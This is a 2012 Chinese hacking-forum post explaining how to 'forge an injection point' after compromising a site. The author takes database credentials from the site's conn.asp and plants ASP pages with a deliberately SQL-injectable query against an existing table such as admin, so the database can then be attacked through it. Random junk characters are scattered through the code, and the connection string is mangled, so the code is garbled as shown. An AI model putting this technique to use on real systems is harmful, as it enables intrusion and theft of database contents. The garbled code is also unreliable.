中国网络渗透测试联盟

标题: 伪造注入点方法 [打印本页]

作者: admin    时间: 2012-9-13 17:53
标题: 伪造注入点方法
首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表。因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
; E; `: j! V) p7 [4 x* A1 ^ASP/Visual Basic代码6 O- Z8 g4 K# ]2 C& r
<!--#include file="xx.asp"-->    4 u0 X1 S6 c/ F  z3 q' g
<%   
2 V6 ]# b& m# Tset rs=server.createobject("ADODB.recordset")   
' L  S$ ~4 j6 a2 c8 Hid = request("id")    3 r9 r6 B( A3 C8 q9 g
strSQL = "select * from admin where id=" & id    2 x2 @+ l, k. T+ O
rs.open strSQL,conn,1,3    + d( R! ]( r3 [
rs.close   
: [+ U' K, J/ e1 o%>  , ^6 d% \  B9 a; E7 i& T" I3 q
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在。你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!
7 u" ~$ c: M  ]: B7 L然后就要构造一个连接数据库的文件了,代码如下:
% `* q8 f7 j7 P& t9 N3 a; i) |, a9 YASP/Visual Basic代码" R* U1 w* x/ N' M9 K
<%            0 P4 z4 P) V. G
strSQLServerName = "000.000.000.000"     '服务器名称或地址    1 G8 j/ O! f0 h8 _) O
strSQLDBUserName = "sqlname"         '数据库帐号    7 ]( S, I; u% J" J$ H
strSQLDBPassword = "sqlpass"         '数据库密码    7 `, @3 E. |$ P* }
strSQLDBName = "sqldataname"           '数据库名称   
& c/ X  Y9 L: H& Q; X$ O: _* w$ k& eSet conn = Server.CreateObject("ADODB.Connection")   
. h, @5 S2 i( {" [$ dstrCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"   $ _- l% Y( [2 [. i
conn.open strCon   
( ^/ M) B. Y/ {" x; b, r( h%>  
8 v; S. E; ~/ f) X! d/ t这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。就这样,正常情况下,就OK了,伪造成功1 h4 P# N' H8 ~" X% c& @





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2